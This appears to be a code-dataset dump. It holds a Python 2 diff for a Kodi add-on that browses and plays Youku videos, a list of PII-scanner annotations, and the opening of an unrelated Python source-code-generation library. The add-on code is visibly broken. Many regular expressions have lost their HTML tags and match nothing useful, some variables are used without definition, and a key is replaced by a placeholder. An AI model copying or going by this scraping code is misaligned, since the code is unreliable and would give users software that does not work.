gzip.GzipFile(fileobj=StringIO.StringIO(httpdata)).read() + charset = response.headers.getparam('charset') + response.close() + except: + log( ""%s (%d) [%s]"" % ( + sys.exc_info()[2].tb_frame.f_code.co_name, + sys.exc_info()[2].tb_lineno, + sys.exc_info()[1] + )) + return '' + match = re.compile('(.+?)').search(text) + if match: + list.append([id, match.group(1)]) + +def getList(listpage,id,genre,area,year): + if id == 'c_95': + str1 = '风格:' + str3a = '发行:' + str3b = 'r' + elif id == 'c_84' or id == 'c_87': + str1 = '类型:' + str3a = '出品:' + str3b = 'pr' + else: + str1 = '类型:' + str3a = '时间:' + str3b = 'r' + match = re.compile('(.+?)' % (str1), re.DOTALL).search(listpage) + genrelist = re.compile('_g_([^_\.]*)[^>]*>([^<]+)').findall(match.group(1)) + getCurrent(match.group(1), 
genrelist, genre) + if id == 'c_84' or id == 'c_87': + arealist = [] + else: + match = re.compile('(.+?)', re.DOTALL).search(listpage) + arealist = re.compile('_a_([^_\.]*)[^>]*>([^<]+)').findall(match.group(1)) + getCurrent(match.group(1), arealist, area) + match = re.compile('(.+?)' % (str3a), re.DOTALL).search(listpage) + yearlist = re.compile('_%s_([^_\.]*)[^>]*>([^<]+)' % (str3b)).findall(match.group(1)) + getCurrent(match.group(1), yearlist, year) + return genrelist,arealist,yearlist + +def getList2(listpage,genre): + match = re.compile('(.+?)', re.DOTALL).search(listpage) + if match: + genrelist = re.compile('
<li[^>]*>(.+?)</li>').findall(match.group(1)) + getCurrent(match.group(1), genrelist, genre) + else: + genrelist = [] + return genrelist + +def rootList(): + link = GetHttpData('http://list.youku.com/') + match0 = re.compile('(.+?)', re.DOTALL).search(link) + match = re.compile('
(.+?)', re.DOTALL).findall(match0.group(1)) + totalItems = len(match) + for path, id, name in match: + if path == 'show': + u = sys.argv[0]+""?mode=1&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=&area=&year=&order=1&days=1&page=1"" + else: + u = sys.argv[0]+""?mode=11&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=0&year=1&order=1&days=1&page=1"" + li = xbmcgui.ListItem(name) + xbmcplugin.addDirectoryItem(int(sys.argv[1]),u,li,True,totalItems) + xbmcplugin.endOfDirectory(int(sys.argv[1])) + +def progList(name,id,page,genre,area,year,order,days): + url = 'http://list.youku.com/category/show/%s_g_%s_a_%s_s_%s_d_%s_r_%s_p_%s.html' % (id, genre, area, order, days, year, page) + link = GetHttpData(url) + match = re.compile('
(.+?)', re.DOTALL).search(link) + plist = [] + if match: + match1 = re.compile('([0-9]+)(|)', re.DOTALL).findall(match.group(1)) + if match1: + for num, temp in match1: + if (num not in plist) and (num != page): + plist.append(num) + totalpages = int(match1[len(match1)-1][0]) + else: + totalpages = 1 + match = re.compile('
(.+?)', re.DOTALL).search(link) + if match: + listpage = match.group(1) + else: + listpage = '' + if id == 'c_95': + match = re.compile('', re.DOTALL).findall(link) + else: + match = re.compile('
(.+?)
    ', re.DOTALL).findall(link) + totalItems = len(match) + 1 + len(plist) + currpage = int(page) + + genrelist,arealist,yearlist = getList(listpage,id,genre,area,year) + if genre: + genrestr = searchDict(genrelist,genre) + else: + genrestr = '全部类型' + if area: + areastr = searchDict(arealist,area) + else: + areastr = '全部地区' + if year: + yearstr = searchDict(yearlist,year) + else: + if id == 'c_84' or id == 'c_87': + yearstr = '全部出品' + else: + yearstr = '全部年份' + li = xbmcgui.ListItem(name+'(第'+str(currpage)+'/'+str(totalpages)+'页)【[COLOR FFFF0000]' + genrestr + '[/COLOR]/[COLOR FF00FF00]' + areastr + '[/COLOR]/[COLOR FFFFFF00]' + yearstr + '[/COLOR]/[COLOR FF00FF00]' + searchDict(DAYS_LIST1,days) + '[/COLOR]/[COLOR FF00FFFF]' + searchDict(ORDER_LIST1,order) + '[/COLOR]】(按此选择)') + u = sys.argv[0]+""?mode=4&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&area=""+urllib.quote_plus(area)+""&year=""+urllib.quote_plus(year)+""&order=""+order+""&days=""+days+""&page=""+urllib.quote_plus(listpage) + xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems) + for i in range(0,len(match)): + if id in ('c_96','c_95'): + mode = 2 + isdir = False + else: + mode = 3 + isdir = True + match1 = re.compile('/id_(.+?).html""').search(match[i]) + p_id = match1.group(1) + match1 = re.compile('(.+?)').search(match[i]) + p_name = match1.group(1) + match1 = re.compile('
(.+?)').search(match[i]) + if match1: + p_name1 = p_name + '(' + match1.group(1) + ')' + else: + p_name1 = p_name + match1 = re.compile('(.+?)').search(match[i]) + if match1: + p_name1 = p_name1 + '[' + match1.group(1) + ']' + li = xbmcgui.ListItem(str(i + 1) + '. ' + p_name1, iconImage = '', thumbnailImage = p_thumb) + u = sys.argv[0]+""?mode=""+str(mode)+""&name=""+urllib.quote_plus(p_name)+""&id=""+urllib.quote_plus(p_id)+""&thumb=""+urllib.quote_plus(p_thumb) + #li.setInfo(type = ""Video"", infoLabels = {""Title"":p_name, ""Director"":p_director, ""Genre"":p_genre, ""Plot"":p_plot, ""Year"":p_year, ""Cast"":p_cast, ""Tagline"":p_tagline}) + xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, isdir, totalItems) + + for num in plist: + li = xbmcgui.ListItem(""... 第"" + num + ""页"") + u = sys.argv[0]+""?mode=1&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&area=""+urllib.quote_plus(area)+""&year=""+year+""&order=""+order+""&days=""+days+""&page=""+str(num) + xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems) + xbmcplugin.setContent(int(sys.argv[1]), 'movies') + xbmcplugin.endOfDirectory(int(sys.argv[1])) + +def getMovie(name,id,thumb): + if len(id)==21: + link = GetHttpData('http://www.youku.com/show_page/id_' + id + '.html') + match = re.compile('.*?href=""http://v.youku.com/v_show/id_(.+?)\.html[^""]*""', re.DOTALL).search(link) + if match: + # play the feature itself + PlayVideo(name, match.group(1), thumb) + else: + # otherwise resolve the trailer + match = re.compile('class=""btnShow btnplaytrailer"".*?href=""http://v.youku.com/v_show/id_(.+?)\.html[^""]*""', re.DOTALL).search(link) + if match: + PlayVideo(name, match.group(1), thumb) + else: + xbmcgui.Dialog().ok(__addonname__, '解析地址异常,可能是收费节目,无法播放') + else: + PlayVideo(name, id, thumb) + +def seriesList(name,id,thumb): + url = ""http://v.youku.com/v_show/id_%s.html"" % (id) + data = GetHttpData(url) + #pages = re.compile('
').findall(data) + #if len(pages) > 1: + # for i in range(1,len(pages)): + # url = ""http://www.youku.com/show_point/id_%s.html?dt=json&divid=%s&tab=0&__rt=1&__ro=%s"" % (id, pages[i], pages[i]) + # link = GetHttpData(url) + # data += link + match = re.compile('class=""item(.+?)', re.DOTALL).findall(data) + totalItems = len(match) + + for i in range(0,len(match)): + match1 = re.compile('//v.youku.com/v_show/id_(.+?)\.html').search(match[i]) + if match1: + p_id = match1.group(1) + else: + continue + #match1 = re.compile('
(.+?)', re.DOTALL).search(link) + plist = [] + if match: + match1 = re.compile('([0-9]+)(|)', re.DOTALL).findall(match.group(1)) + if match1: + for num, temp in match1: + if (num not in plist) and (num != page): + plist.append(num) + totalpages = int(match1[len(match1)-1][0]) + else: + totalpages = 1 + match = re.compile('(.+?)', re.DOTALL).search(link) + if match: + listpage = match.group(1) + else: + listpage = '' + match = re.compile('', re.DOTALL).findall(link) + + totalItems = len(match) + 1 + len(plist) + currpage = int(page) + + genrelist = getList2(listpage, genre) + if genre == '0': + genrestr = '全部类型' + else: + genrestr = searchDict(genrelist,genre) + li = xbmcgui.ListItem(name+'(第'+str(currpage)+'/'+str(totalpages)+'页)【[COLOR FFFF0000]' + genrestr + '[/COLOR]/[COLOR FF00FF00]' + searchDict(DAYS_LIST2,days) + '[/COLOR]/[COLOR FF00FFFF]' + searchDict(ORDER_LIST2,order) + '[/COLOR]】(按此选择)') + u = sys.argv[0]+""?mode=12&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&order=""+order+""&days=""+days+""&page=""+urllib.quote_plus(listpage) + xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems) + for i in range(0,len(match)): + match1 = re.compile('/id_(.+?).html""').search(match[i]) + p_id = match1.group(1) + match1 = re.compile('(.+?)').search(match[i]) + p_name = match1.group(1) + p_name1 = p_name + li = xbmcgui.ListItem(str(i + 1) + '. ' + p_name1, iconImage = '', thumbnailImage = p_thumb) + u = sys.argv[0]+""?mode=10&name=""+urllib.quote_plus(p_name)+""&id=""+urllib.quote_plus(p_id)+""&thumb=""+urllib.quote_plus(p_thumb) + #li.setInfo(type = ""Video"", infoLabels = {""Title"":p_name, ""Director"":p_director, ""Genre"":p_genre, ""Plot"":p_plot, ""Year"":p_year, ""Cast"":p_cast, ""Tagline"":p_tagline}) + xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, False, totalItems) + + for num in plist: + li = xbmcgui.ListItem(""... 第"" + num + ""页"") + u = sys.argv[0]+""?mode=11&name=""+urllib.quote_plus(name)+""&id=""+urllib.quote_plus(id)+""&genre=""+urllib.quote_plus(genre)+""&order=""+order+""&days=""+days+""&page=""+str(num) + xbmcplugin.addDirectoryItem(int(sys.argv[1]), u, li, True, totalItems) + xbmcplugin.setContent(int(sys.argv[1]), 'movies') + xbmcplugin.endOfDirectory(int(sys.argv[1])) + +def selResolution(streamtypes): + ratelist = [] + for i in range(0,len(streamtypes)): + if streamtypes[i] in ('flv', 'flvhd'): ratelist.append([4, '标清', i, 'flv']) # [resolution setting value, label, streamtypes index] + if streamtypes[i] in ('mp4', 'mp4hd'): ratelist.append([3, '高清', i, 'mp4']) + if streamtypes[i] in ('hd2', 'hd2v2', 'mp4hd2', 'mp4hd2v2'): ratelist.append([2, '超清', i, 'hd2']) + if streamtypes[i] in ('hd3', 'hd3v2', 'mp4hd3', 'mp4hd3v2'): ratelist.append([1, '1080P', i, 'hd3']) + ratelist.sort() + if len(ratelist) > 1: + resolution = int(__addon__.getSetting('resolution')) + if resolution == 0: # ask for the resolution on every playback + list = [x[1] for x in ratelist] + sel = xbmcgui.Dialog().select('清晰度(低网速请选择低清晰度)', list) + if sel == -1: + return None, None, None, None + else: + sel = 0 + while sel < len(ratelist)-1 and resolution > ratelist[sel][0]: sel += 1 + else: + sel = 0 + return streamtypes[ratelist[sel][2]], ratelist[sel][1], ratelist[sel][2], ratelist[sel][3] + +def youku_ups(id): + res = urllib2.urlopen('https://log.mmstat.com/eg.js') + cna = res.headers['etag'][1:-1] + query = urllib.urlencode(dict( + vid = id, + ccode = '0516', + client_ip = '127.0.0.1', + utid = cna, + client_ts = time.time() / 1000, + ckey = 'PI:KEY' + )) + url = 'https://ups.youku.com/ups/get.json?%s' % (query) + link = GetHttpData(url, referer='http://v.youku.com/') + json_response = simplejson.loads(link) + api_data = json_response['data'] + data_error = api_data.get('error') + if data_error: + api_error_code = data_error.get('code') + api_error_msg = data_error.get('note').encode('utf-8') + dialog = xbmcgui.Dialog() + ok = dialog.ok(__addonname__,'地址解析错误(%d):\n%s' % (api_error_code,api_error_msg)) +
return {} + else: + return api_data + +def change_cdn(url): + # if the cdn_url starts with an ip addr, it should be youku's old CDN + # which rejects http requests randomly with status code > 400 + # changing it to the aliCDN dispatcher does better, + # at least a little more recoverable from HTTP 403 + dispatcher_url = 'vali.cp31.ott.cibntv.net' + if dispatcher_url in url: + return url + elif 'k.youku.com' in url: + return url + else: + url_seg_list = list(urlparse.urlsplit(url)) + url_seg_list[1] = dispatcher_url + return urlparse.urlunsplit(url_seg_list) + +def PlayVideo(name,id,thumb): + movdat = youku_ups(id) + if not movdat: + return + + vid = id + lang_select = int(__addon__.getSetting('lang_select')) # default | ask every time | auto-select preferred + if lang_select != 0 and movdat.has_key('dvd') and 'audiolang' in movdat['dvd']: + langlist = movdat['dvd']['audiolang'] + if lang_select == 1: + list = [x['lang'] for x in langlist] + sel = xbmcgui.Dialog().select('选择语言', list) + if sel ==-1: + return + vid = langlist[sel]['vid'].encode('utf-8') + name = '%s %s' % (name, langlist[sel]['lang'].encode('utf-8')) + else: + lang_prefer = __addon__.getSetting('lang_prefer') # Mandarin | Cantonese + for i in range(0,len(langlist)): + if langlist[i]['lang'].encode('utf-8') == lang_prefer: + vid = langlist[i]['vid'].encode('utf-8') + name = '%s %s' % (name, langlist[i]['lang'].encode('utf-8')) + break + if vid != id: + movdat = youku_ups(vid) + if not movdat: + return + + streamtypes = [stream['stream_type'].encode('utf-8') for stream in movdat['stream']] + typeid, typename, streamno, resolution = selResolution(streamtypes) + if typeid: + ''' + oip = movdat['security']['ip'] + ep = movdat['security']['encrypt_string'] + sid, token = youkuDecoder().get_sid(ep) + play_method = int(__addon__.getSetting('play_method')) + if play_method != 0: # m3u8 method + query = urllib.urlencode(dict( + vid=vid, ts=int(time.time()), keyframe=1, type=resolution, + ep=ep, oip=oip, ctype=12, ev=1, token=token, sid=sid, + )) + cookie = ['%s=%s' % (x.name, x.value) for x in cj][0] + movurl = 'http://pl.youku.com/playlist/m3u8?%s|Cookie=%s' % (query, cookie) + + else: # default playback method + if typeid in ('mp4', 'mp4hd'): + type = 'mp4' + else: + type = 'flv' + urls = [] + segs = movdat['stream'][streamno]['segs'] + total = len(segs) + for no in range(0, total): + k = segs[no]['key'] + if k == -1: + dialog = xbmcgui.Dialog() + ok = dialog.ok(__addonname__,'会员节目,无法播放') + return + fileid = segs[no]['fileid'] + ep = youkuDecoder().generate_ep(no, fileid, sid, token) + query = urllib.urlencode(dict( + ctype = 12, + ev = 1, + K = k, + ep = urllib.unquote(ep), + oip = oip, + token = token, + yxon = 1 + )) + url = 'http://k.youku.com/player/getFlvPath/sid/{sid}_00/st/{container}/fileid/{fileid}?{query}'.format( + sid = sid, + container = type, + fileid = fileid, + query = query + ) + link = GetHttpData(url) + json_response = simplejson.loads(link) + urls.append(json_response[0]['server'].encode('utf-8')) + movurl = 'stack://' + ' , '.join(urls) + ''' + movurl = movdat['stream'][streamno]['m3u8_url'] + #urls = [] + #is_preview = False + #for seg in movdat['stream'][streamno]['segs']: + # if seg.get('cdn_url'): + # urls.append(change_cdn(seg['cdn_url'].encode('utf-8'))) + # else: + # is_preview = True + #if not is_preview: + # movurl = 'stack://' + ' , '.join(urls) + name = '%s[%s]' % (name, typename) + listitem=xbmcgui.ListItem(name,thumbnailImage=thumb) + listitem.setInfo(type=""Video"",infoLabels={""Title"":name}) + xbmc.Player().play(movurl, listitem) + +def
performChanges(name,id,listpage,genre,area,year,order,days): + genrelist,arealist,yearlist = getList(listpage,id,genre,area,year) + change = False + if id == 'c_95': + str1 = '风格' + str3 = '发行' + elif id == 'c_84' or id == 'c_87': + str1 = '类型' + str3 = '出品' + else: + str1 = '类型' + str3 = '时间' + dialog = xbmcgui.Dialog() + if len(genrelist)>0: + list = [x[1] for x in genrelist] + sel = dialog.select(str1, list) + if sel != -1: + genre = genrelist[sel][0] + change = True + if len(arealist)>0: + list = [x[1] for x in arealist] + sel = dialog.select('地区', list) + if sel != -1: + area = arealist[sel][0] + change = True + if len(yearlist)>0: + list = [x[1] for x in yearlist] + sel = dialog.select(str3, list) + if sel != -1: + year = yearlist[sel][0] + change = True + list = [x[1] for x in DAYS_LIST1] + sel = dialog.select('范围', list) + if sel != -1: + days = DAYS_LIST1[sel][0] + change = True + list = [x[1] for x in ORDER_LIST1] + sel = dialog.select('排序', list) + if sel != -1: + order = ORDER_LIST1[sel][0] + change = True + + if change: + progList(name,id,'1',genre,area,year,order,days) + +def performChanges2(name,id,listpage,genre,order,days): + genrelist = getList2(listpage, genre) + change = False + dialog = xbmcgui.Dialog() + if len(genrelist)>0: + list = [x[1] for x in genrelist] + sel = dialog.select('类型', list) + if sel != -1: + genre = genrelist[sel][0] + change = True + list = [x[1] for x in DAYS_LIST2] + sel = dialog.select('范围', list) + if sel != -1: + days = DAYS_LIST2[sel][0] + change = True + list = [x[1] for x in ORDER_LIST2] + sel = dialog.select('排序', list) + if sel != -1: + order = ORDER_LIST2[sel][0] + change = True + + if change: + progList2(name,id,'1',genre,order,days) + +def get_params(): + param = [] + paramstring = sys.argv[2] + if len(paramstring) >= 2: + params = sys.argv[2] + cleanedparams = params.replace('?', '') + if (params[len(params) - 1] == '/'): + params = params[0:len(params) - 2] + pairsofparams = cleanedparams.split('&') + param = {} + for i in range(len(pairsofparams)): + splitparams = {} + splitparams = pairsofparams[i].split('=') + if (len(splitparams)) == 2: + param[splitparams[0]] = splitparams[1] + return param + +params = get_params() +mode = None +name = '' +id = '' +genre = '' +area = '' +year = '' +order = '' +page = '1' +url = None +thumb = None + +try: + thumb = urllib.unquote_plus(params[""thumb""]) +except: + pass +try: + url = urllib.unquote_plus(params[""url""]) +except: + pass +try: + page = urllib.unquote_plus(params[""page""]) +except: + pass +try: + order = urllib.unquote_plus(params[""order""]) +except: + pass +try: + days = urllib.unquote_plus(params[""days""]) +except: + pass +try: + year = urllib.unquote_plus(params[""year""]) +except: + pass +try: + area = urllib.unquote_plus(params[""area""]) +except: + pass +try: + genre = urllib.unquote_plus(params[""genre""]) +except: + pass +try: + id = urllib.unquote_plus(params[""id""]) +except: + pass +try: + name = urllib.unquote_plus(params[""name""]) +except: + pass +try: + mode = int(params[""mode""]) +except: + pass + +cj = cookielib.CookieJar() +opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) +urllib2.install_opener(opener) + +if mode == None: + rootList() +elif mode == 1: + progList(name,id,page,genre,area,year,order,days) +elif mode == 2: + getMovie(name,id,thumb) +elif mode == 3: + seriesList(name,id,thumb) +elif mode == 4: + performChanges(name,id,page,genre,area,year,order,days) +elif mode == 10: + PlayVideo(name,id,thumb) +elif mode == 11: + 
progList2(name,id,page,genre,order,days) +elif mode == 12: + performChanges2(name,id,page,genre,order,days) + +",27353,"[['URL', ""http://list.youku.com/'""], ['URL', ""http://list.youku.com/category/show/%s_g_%s_a_%s_s_%s_d_%s_r_%s_p_%s.html'""], ['URL', ""http://www.youku.com/show_page/id_'""], ['URL', 'http://v.youku.com/v_show/id_%s.html""'], ['URL', 'http://www.youku.com/show_point/id_%s.html?dt=json&divid=%s&tab=0&__rt=1&__ro=%s""'], ['URL', ""http://list.youku.com/category/video/%s_g_%s_s_%s_d_%s_p_%s.html'""], ['IP_ADDRESS', '127.0.0.1'], ['URL', ""https://ups.youku.com/ups/get.json?%s'""], ['URL', ""http://v.youku.com/'""], ['URL', ""http://pl.youku.com/playlist/m3u8?%s|Cookie=%s'""], ['URL', ""http://k.youku.com/player/getFlvPath/sid/{sid}_00/st/{container}/fileid/{fileid}?{query}'.format""], ['LOCATION', 'xbmcgui'], ['LOCATION', 'xbmcaddon'], ['PERSON', 'urllib2'], ['LOCATION', 'os'], ['LOCATION', 'gzip'], ['PERSON', 'Mozilla/5.0'], ['DATE_TIME', ""'5','最受欢迎'""], ['PERSON', 'DAYS_LIST2'], ['DATE_TIME', '65536'], ['NRP', 'sid'], ['PERSON', 'token = e_code.split'], ['NRP', 'sid'], ['PERSON', 'LOGDEBUG'], ['URL', 'code.co'], ['URL', 'urllib2.Re'], ['URL', 'req.ad'], ['URL', 'response.re'], ['PERSON', 'c_95'], ['DATE_TIME', 'year'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 're.DO'], ['URL', 'sys.ar'], ['URL', 'sys.ar'], ['URL', 'xbmcgui.Li'], ['DATE_TIME', 'days'], ['DATE_TIME', 'days'], ['URL', 're.com'], ['URL', 're.DO'], ['PERSON', 'match1 ='], ['URL', 're.DO'], ['PERSON', 'c_95'], ['URL', 're.DO'], ['URL', 're.com'], ['URL', 're.DO'], ['PERSON', 'genrestr = searchDict(genrelist'], ['PERSON', 'areastr'], ['PERSON', 'areastr'], ['PERSON', 'areastr'], ['PERSON', ""yearstr + '""], ['URL', 'sys.ar'], ['URL', 'xbmcplugin.ad'], ['URL', 'sys.ar'], ['PERSON', 'match1 ='], ['PERSON', 'match1 = re.compile(\'
  • . + +"""""" +.. moduleauthor:: Douglas RAILLARD dummy@email.com + +This module mostly provides base classes intended to be subclassed for building +langage specific source code generation libraries. + +They implement functionnalities related to operators overloading that can be used in any langage. +Every class representing source code constructs are known as node. +The following helpers functions are provided: + +* :func:`listify`: create a list from an iterable or a single element. +* :func:`format_string`: format a string according to the given convention (camel case, upper case, etc.). +* :func:`strip_starting_blank_lines`: strip the blank lines at the beginning of a multiline string. + +The following classes are provided: + +* :class:`Indentation`: manage the indentation level in the code generator. +* :class:`NonIterable`: inheriting that class allows a class which can be considered as iterable to be considered as a non iterable by :func:`listify`. +* :class:`NodeMeta`: metaclass of all class representing some source code constructs. +* :class:`NodeABC`: abstract base class of all class representing some source code constructs. +* :class:`NodeBase`: base class of almost all class representing some source code constructs. +* :class:`NodeAttrProxy`: proxy class that forwards the calls to the :class:`NodeABC` API to an attribute which is itself a :class:`NodeABC`. It implements composition. +* :class:`EnsureNode`: descriptor used to build attributes that guarantee that they contain an instance of NodeABC. +* :class:`DelegatedAttribute`: descriptor used to delegate an attribute to another instance which has the given attribute name. +* :class:`NodeViewBase`: base class for class representing a view of another node (for example a variable declaration is a view of a variable). +* :class:`PhantomNode`: class which can be used as an empty placeholder when a node is required. +* :class:`NodeContainerBase`: base class for node containers. It mostly implements operator overloading. +* :class:`TokenListABC`: abstract base class for token lists. This is a node that can contain a list of any object that can be used as a string, and concatenate them when printed. +* :class:`DelegatedTokenListBase`: base class for a token list that uses a specific attribute to really hold the token list instance (thus implementing composition instead of inheritance). +* :class:`TokenListBase`: base class for a token list. +* :class:`IndentedTokenListBase`: base class for a token list which indents it content when printed. +* :class:`IndentedDelegatedTokenListBase`: mix of :class:`IndentedTokenListBase` and :class:`DelegatedTokenListBase`. +* :class:`BacktraceBase`: base class for special token list that output a simplified backtrace of Python code that was used to build the instance. Useful when trying to debug the code generator. + +"""""" + + +import collections +import numbers +import abc +import inspect +import copy +import functools +import os + + +def listify(iterable_or_single_elem): + """"""Create a list out of: + + * an iterable object: the result will be like ``list(iterable_or_single_elem)`` + * a object which cannot be iterated over: return a list with only one item (just the object) + * an object which is iterable, but also a subclass of :class:`NonIterable`: + return a list with just the object, as if it was not iterable. 
+ """""" + if iterable_or_single_elem is None: + return [] + # We exclude iterables such as strings or NonIterable (StmtContainer for example) + # because we want to keep them as one object and not split them + if isinstance(iterable_or_single_elem, collections.Iterable) \ + and not isinstance(iterable_or_single_elem, (str, NonIterable)): + return list(iterable_or_single_elem) + else: + return [iterable_or_single_elem] + +def format_string(string, style, separator=""_""): + """""" Format a string according to a convention. + + It is can be used to write identfiers name in a unified format before applying a naming convention. + + :param string: the string to be modified. It must be in a format where the word sperator is always the same. + :param style: the convention. It can be one of: + + * UpperCamelCase + * lowerCamelCase + * lower_underscore_case + * UPPER_UNDERSCORE_CASE + :param separator: the word separator used to split the words appart before applying the convention. + It defaults to '_'. + """""" + if isinstance(string, collections.Iterable) and not isinstance(string, (str, NonIterable)): + token_list = string + else: + token_list = str(string).split(separator) + # If there is only one token in the list and in case it is an empty + # string, we dont want to replace it with a _ + if len(token_list) != 1: + for i, token in enumerate(token_list): + if not token: + token_list[i] = separator + + if style == ""UpperCamelCase"": + return """".join(token.capitalize() for token in token_list) + + if style == ""lowerCamelCase"": + first_word = token_list[0].lower() + remain_list = token_list[1:] + return first_word+"""".join(token.capitalize() for token in remain_list) + + if style == ""lower_underscore_case"": + return ""_"".join(token.lower() for token in token_list) + + if style == ""UPPER_UNDERSCORE_CASE"": + return ""_"".join(token.upper() for token in token_list) + +def strip_starting_blank_lines(snippet): + """"""Strip blank lines at the beginning of a multiline string."""""" + + last_new_line_pos = 0 + for position, char in enumerate(snippet): + if char=='\n': + last_new_line_pos = position + elif char!='\t' and char!=' ' and char!='\v': + break + # Only keep one new line at the beginning, to avoid multiple blank lines + return snippet[last_new_line_pos:] + +class Indentation: + """"""This class manages the indentation in the source code output. + + Instances can be printed to give the string to put at the beginning of a new indented line. + + >>> idt = Indentation() + >>> idt.indent() + >>> print('*'+str(idt)+'indented Hello World') + * indented Hello World + """""" + + # Default indentation style (4 spaces) + indentation_string = ' ' + + @classmethod + def ensure_idt(cls, idt): + """"""Create a new indentation instance if *idt* is None, + or return *idt* if it is already an :class:`Indentation` instance. + """""" + if idt is None: + idt = cls() + elif isinstance(idt, numbers.Integral): + idt = cls(idt) + elif isinstance(idt, str): + idt = cls(indentator=idt) + return idt + + + def __init__(self, level=0, indentator=None): + """""" + :param level: the initial indentation level + :type level: int + :param indentator: the string used to display indentation. + It defaults to the class attribute *indentation_string* which is four spaces. 
+ """""" + self.indentation_level = level + # If an indentation is string is given, override the classwide default with + # an instance-local string + if indentator is not None: + self.indentation_string = indentator + + def indent(self, level=1): + """"""Increase the indentation level by *level* levels."""""" + self.indentation_level += level + + def dedent(self, level=1): + """"""Decrease the indentation level by *level* levels."""""" + self.indentation_level -= level + + def __str__(self): + """"""Return the string to be used at the beginning of a line to display the indentation."""""" + return self.indentation_string * self.indentation_level + + +class NonIterable: + """""" Inheriting from this class will prevent a class to be considered as + :class:`collections.Iterable` by :func:`listify`. + """""" + pass + +class NodeMeta(abc.ABCMeta): + """"""Meta class used for every node, i.e. every class representing source code constructs. + + Currently, it only does a bit of black magic on :meth:`NodeABC.inline_str` and :meth:`NodeABC.self_inline_str` methods: + it creates a wrapper around them that calls *inline_str_filter* if it exists on their return string, to + let the user apply some naming convention at the latest stage. + """""" + def __new__(meta, name, bases, dct): + # Add automatic 'inheritance' for __format_string class attribute + attr_name = '_'+name+'__format_string' + if bases and not attr_name in dct: + try: + dct[attr_name] = bases[0].__dict__['_'+bases[0].__name__+'__format_string'] + except KeyError: + pass + + # Wrap inline_str function to allow automatic filtering on its output + def make_wrapper(wrapped_fun): + @functools.wraps(wrapped_fun) + def wrapper_fun(self, *args, **kwargs): + result = wrapped_fun(self, *args, **kwargs) + try: + filter_fun = self.inline_str_filter + except AttributeError: + # Just return the string as is, no filter hook is installed + return result + else: + # Call the filter on the resulting string + return filter_fun(result) + + return wrapper_fun + + for stringify_fun_name in ['inline_str', 'self_inline_str']: + if stringify_fun_name in dct: + wrapped_fun = dct[stringify_fun_name] + dct[stringify_fun_name] = make_wrapper(wrapped_fun) + + return super().__new__(meta, name, bases, dct) + +class NodeABC(metaclass=NodeMeta): + """"""This class is an Abstract Base Class describing the most basic API evey node should conform to."""""" + __format_string = '' + + @abc.abstractmethod + def inline_str(self, idt=None): + """"""This function is called to print the content of the node in an inline context. + + This can be for example when the node is printed inside an expression. + This function should not try to print a preceding new line or indentation string. + """""" + + pass + @abc.abstractmethod + def freestanding_str(self, idt=None): + """"""This function is called to print the content of the node in a freestanding context. + + This can be for example when the node is printed in directly in the source file. + This function should print the preceding new line and indentation if the source code constructs + requires it. + """""" + pass + + @abc.abstractmethod + def adopt_node(self, child): + pass + +class NodeAttrProxy(NodeABC): + """"""This class is a proxy that redirects calls to the :class:`NodeABC` API to a given + attribute of a given instance. + + It creates stubs that allows transparent composition for the most limited subset of the APIs + provided by this library to avoid getting into crazy things. 
+ This class should really be used when it enables a lot of code to be factored out. A design based on + hooks implemented in subclasses called by a base class is preferable in most cases where you + would be tempted to use this proxy. + """""" + def __init__(self, obj, attr_name): + self.obj = obj + self.attr_name = attr_name + + def inline_str(self, idt=None): + return getattr(self.obj, self.attr_name).inline_str(idt) + + def freestanding_str(self, idt=None): + return getattr(self.obj, self.attr_name).freestanding_str(idt) + + def adopt_node(self, child): + return getattr(self.obj, self.attr_name).adopt_node(child) + +class EnsureNode: + """"""This class is a descriptor that makes sure that the attribute that uses it holds a reference + to an instance of one of the classes given in *node_classinfo*. + + When set, this descriptor checks if the given object is indeed an instance of one of the *node_classinfo* classes. + If not, it calls *node_factory* to build an object and stores its return value. Therefore, + the content of the attribute using this descriptor is always some instance of the classes + contained in *node_classinfo*. This descriptor is used as a gatekeeper to be able to make some assumptions + on the type of data held by the attribute. + + .. note:: The *node_classinfo* always contains the class :class:`NodeABC`. + """""" + def __init__(self, storage_attr_name, node_factory, node_classinfo=()): + """""" + :param storage_attr_name: the underlying attribute used to store the object. + :param node_factory: the factory called when someone tries to store a non :class:`NodeABC` inside the attribute. + :param node_classinfo: this is a tuple that contains classes. + The value stored in the attribute is checked against this tuple using :func:`isinstance` to + determine if the factory should be used. This always contains at least :class:`NodeABC` + """""" + self.storage_attr_name = storage_attr_name + self.node_factory = node_factory + + node_classinfo = listify(node_classinfo)+[NodeABC] + if inspect.isclass(self.node_factory): + node_classinfo.append(self.node_factory) + node_classinfo = tuple(node_classinfo) + + self.node_classinfo = node_classinfo + + def __get__(self, instance, owner): + if instance is not None: + return instance.__dict__[self.storage_attr_name] + # If the descriptor is called as a class attribute, it + # just returns itself, to allow the world to see that it + # is a descriptor + else: + return self + + def __set__(self, instance, value): + if not isinstance(value, self.node_classinfo): + value = self.node_factory(value) + instance.__dict__[self.storage_attr_name] = value + +class NodeBase(NodeABC): + """"""This class is the base class of most nodes. + + It provides some default implementations for methods of :class:`NodeABC`. + """""" + @classmethod + def ensure_node(cls, obj, factory=None): + """"""Ensure that the given object *obj* is an instance of the class this method is called from or of :class:`NodeABC`, + and if not, tries to build a node from it using the class this class method is called from or *factory*. + + .. note:: You should rather use the :class:`EnsureNode` descriptor when possible, instead of making use of + this class method. + + .. warning:: Not every class supports being called with only one parameter, so a call to this + class method is not guaranteed to succeed. + + + :param obj: the object to build a node from. + :param factory: an optional factory used to build the node from *obj*.
